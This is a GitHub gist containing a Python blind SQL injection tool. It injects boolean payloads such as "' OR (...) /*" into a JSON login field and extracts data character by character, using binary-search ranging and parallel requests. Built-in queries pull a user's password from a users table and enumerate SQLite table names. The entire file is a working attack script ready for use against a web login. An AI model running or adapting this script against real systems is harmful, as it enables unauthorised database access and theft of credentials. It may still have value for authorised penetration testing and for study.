Skip to content

Instantly share code, notes, and snippets.

@RPHAELLA
Last active January 7, 2021 09:08
Show Gist options
  • Save RPHAELLA/a3a3e708653f61970a959f18dd77e915 to your computer and use it in GitHub Desktop.
Save RPHAELLA/a3a3e708653f61970a959f18dd77e915 to your computer and use it in GitHub Desktop.
# Blind SQL Injection Enumeration
# Copyright (C) 2019
#!/usr/bin/python
import sys
import re
import json
import requests
import urllib3
from itertools import repeat
from multiprocessing import Pool
proxies = {
"http": "http://127.0.0.1:8080",
"https": "http://127.0.0.1:8080"
}
urllib3.disable_warnings()
'''
Configure proxy service
'''
s = requests.Session()
s.verify = False
s.proxies.update(proxies)
'''
Send payload with different [CHAR] to server
'''
def _sending_payload(args, sqli, j):
modified_sqli = sqli.replace("[CHAR]", str(j))
if args["sql_type"] == "sqlite":
modified_sqli = sqli.replace("[CHAR]", str(hex(j).lstrip('0x')))
payload = args["payload"].replace("[PAYLOAD]", modified_sqli)
data_string = args["data_string"].replace("[INJECTION]", payload)
if args["method"] == "GET":
r = s.get(url=args["target"], headers=args["header"], params=data_string)
if args["method"] == "POST":
r = s.post(url=args["target"], headers=args["header"], data=data_string)
resp = re.search(args["search_term"], r.text)
if resp:
return j
return None
'''
Implement multiprocessor to speed-up sending of payload
TO-DO: Allow no. of processes to be set dynamically
'''
def _worker_sending(args, sqli, start, end):
sqli = sqli.replace("[COMPARATOR]", "=")
iterable = zip(repeat(args), repeat(sqli), range(start, end))
with Pool(processes=5) as pool:
return pool.starmap(_sending_payload, iterable)
'''
Search for the most optimal range of ascii [CHAR] to enumerate
TO-DO: Allow dynamically set counter
'''
def _finding_optimal(args, sqli, start, end, counter):
mid = start + ((end-start)//2)
osqli = sqli.replace("[COMPARATOR]", "<")
if counter == 3:
return start, end
if _sending_payload(args, osqli, mid) != None:
return _finding_optimal(args, sqli, start, mid, counter+1)
else:
return _finding_optimal(args, sqli, mid-1, end, counter+1)
'''
Get the most optimal range of ascii [CHAR] and proceed to send payload
'''
def _optimize_attack(args, sqli):
start, end = _finding_optimal(args, sqli, 32, 126, 0)
return _worker_sending(args, sqli, start, end)
'''
Set the injection comparators for payload
TO-DO: Move injection_string to allow user to define easier
'''
def _formulate_payload(args, sql_query, eof_range):
data = ""
for i in range(1, eof_range):
injection_string = "(ascii(substring(%s from %d for 1)))[COMPARATOR][CHAR]" % (sql_query, i)
if args["sql_type"] == "sqlite":
injection_string = "hex(substr((%s),%d,1))[COMPARATOR]'[CHAR]'" % (sql_query, i)
# print injection_string
output = _optimize_attack(args, injection_string)
try:
extracted_char = chr(list(filter(None.__ne__, output))[0])
sys.stdout.write(extracted_char)
sys.stdout.flush()
data += extracted_char
except:
pass
return data
'''
To read every single records returned from the database
- Length is fixed to read 2 chars
- Data is dependent on the return value of length
'''
def _process_payload(index, args, sql_query):
sys.stdout.write("\n[Record %s] Length: " % index)
length = _formulate_payload(args, sql_query[0], 2+1)
sys.stdout.flush()
sys.stdout.write("\n[Record %s] Data: " % index)
return _formulate_payload(args, sql_query[1], int(length)+1)
'''
To allow single or multiple data-records enumeration
'''
def _staging_payload(type, args, sql_query):
if type == "s":
_process_payload(0, args, sql_query)
if type == "r":
sys.stdout.write("[*] Total records: ")
records = _formulate_payload(args, sql_query[0], 2+1)
sys.stdout.flush()
tmp_query = []
for i in range (0, int(records)):
tmp_query = []
for item in sql_query[1:]:
tmp_query.append(item.replace("[OFFSET]", str(i)))
_process_payload(i, args, tmp_query)
'''
Set injection payload
'''
def _launch(args, context):
# Options
# [1] limit/**/1,1
# [2] where id=1
injection = []
if context == "password":
injection.append("select length(password) from users where id=1")
injection.append("select password from users where id=1")
return _staging_payload("s", args, injection)
if context == "tables":
injection.append("SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'")
injection.append("SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset [OFFSET]")
injection.append("SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset [OFFSET]")
return _staging_payload("r", args, injection)
def main():
args = {}
args["target"] = ""
args["method"] = "POST"
args["header"] = {"content-type": "application/json"}
args["data_string"] = '{"email": "[INJECTION]", "password":"\'"}'
args["payload"] = "' OR ([PAYLOAD]) /*"
args["search_term"] = "authentication"
args["sql_type"] = "sqlite"
_launch(args, "tables")
print("\n[+] Done!")
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment